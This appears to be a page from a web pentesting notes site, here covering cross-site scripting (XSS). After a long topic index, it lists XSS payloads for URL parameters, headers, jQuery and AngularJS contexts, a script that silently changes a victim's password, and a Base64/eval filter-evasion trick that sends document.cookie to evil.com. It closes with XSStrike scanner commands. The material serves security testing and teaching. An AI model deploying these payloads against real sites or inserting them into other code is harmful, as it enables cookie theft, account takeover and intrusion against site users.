Exploit Notes

Exploits related to Web

Method

HTTP Rate Limit Bypass

Virtual Hosts (VHOSTS) Enumeration

WAF (Web Application Firewall) Detection

Web Basic Pentesting

Web Content Discovery

Web Login Bypass

Security Risk

Blind XXE

Broken Access Control

Business Logic Attack

CORS (Cross-Origin Resource Sharing) Attack

CRLF (Carriage Return Line Feed) Injection

CSRF (Cross-Site Request Forgery)

Cookie Hijacking

Directory (Path) Traversal

File Inclusion

File Upload Attack

HTTP Request Smuggling

IDOR (Insecure Direct Object References) Attack

Insecure Deserialization

JSON.NET Deserialization

NoSQL Injection

Node.js Deserialization Attack

OAuth Attack

OS Command Injection

Open Redirect

PHP Object Injection

SQL Injection Cheat Sheet

SQL Injection with Sqlmap

SSRF (Server-Side Request Forgery)

SSTI (Server-Side Template Injection)

XSS (Cross-Site Scripting)

XSS with Dynamic PDF

XST (Cross-Site Tracing)

XXE (XML External Entity)

CMS

Bolt CMS Pentesting

CMS (Content Management System) Pentesting

Cockpit CMS Pentesting

Concrete CMS Pentesting

FUEL CMS Pentesting

Joomla CMS Pentesting

Mara CMS Pentesting

Subrion CMS Pentesting

TYPO3 Pentesting

WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting

Angular Pentesting

Apache Struts Pentesting

Django Pentesting

Flask Jinja2 Pentesting

Spring Cloud Function RCE

Spring Pentesting

Werkzeug Pentesting

API

API Pentesting

GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting

Spring Cloud Function RCE

Tool

How to Use Burp Suite

How to Use OWASP ZAP

Others

Apache ActiveMQ Pentesting

Apache Tomcat Pentesting

Atlassian Confluence Pentesting

Browser in the Browser (BITB) Attack

ClipBucket Pentesting

Code Deobfuscation

Codiad Pentesting

Dompdf RCE

Dump Git Repository from Website

Grafana Pentesting

HashiCorp Consul Pentesting

JBOSS Pentesting

JWT (Json Web Token) Pentesting

Jenkins Pentesting

Log4j Pentesting

OpenCATS Pentesting

PHP Srand Time Abusing

Restaurant Management System (RMS) Pentesting

TeamCity Pentesting

Tiny File Manager Pentesting

Web Browser Settings for Pentesting

Web PHP Pentesting

WebAnno Pentesting

WebDAV Pentesting

WebSocket Pentesting

Webmin Pentesting

XSS (Cross-Site Scripting)

Last modified: 2023-03-19

XSS Web

XSS enables attackers to injection client-side scripts into web applications.

Payloads

We can insert them into URL params, POST params or HTTP headers.

<script>alert(1)</script>
"><script>alert(1)</script>
<script>alert(1)</script>
"><script>alert(1)</script>
'></script><script>alert(1)</script>
';alert(1);'

" src=1 onerror=alert(1)>
<><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
"></span><img src=1 onerror=alert(1)>
"><svg onload=alert(1)>

javascript:alert(1)
\"-alert(1)//

%3Cscript%3Ealert%281%29%3C%2Fscript%3E

<a onmouseover=alert(1)>click</a>
" onmouseleave='alert(1)'">

<img src="jav ascript:alert(1)">
<img src="jav&#x09;ascript:alert(1)">
<img src="jav&#x0A;ascript:alert(1)">

</textarea><script>alert(1)</script>

<script>fetch('/profile?new_password=password');</script>

/?q=&subparam=--><script>alert(1)</script>
/index.php#value='><script>alert(1)</script>

JQuery

https://vulnerable.com/#<img src=1 onerror=alert(1)>
<iframe src="https://vulnerable.com/#" onload="this.src+='<img src=1 onerror=alert(1)>'">

AngularJS

If you find "<html ng-app>" or "<div ng-app>" in the HTML source code, you may be able to abuse it by XSS.

https://vulnerable.com/?search={{$on.constructor('alert(1)')()}}

Filter Evasion

Base64 & Eval

Website may sanitize inputs to prevent from malicious code. However, we might be able to circumvent by modifying our code.
For example, change JavaScript code to Base64 string.

fetch("http://evil.com/"+document.cookie);
# Base64: ZmV0Y2goImh0dHA6Ly9ldmlsLmNvbS8iICsgZG9jdW1lbnQuY29va2llKTs=

Insert the base64 string into the “eval” function as below.

# '(' => '\x28'
# ')' => '\x29'
<img src="x" onerror=eval.call`${"eval\x28atob`ZmV...2EoZCkpKQo=`\x29"}`

Automation

XSStrike is a XSS scanner.

# GET request
python xsstrike.py -u http://vulnerable.com/?param=test

# POST reqeust
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"

# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.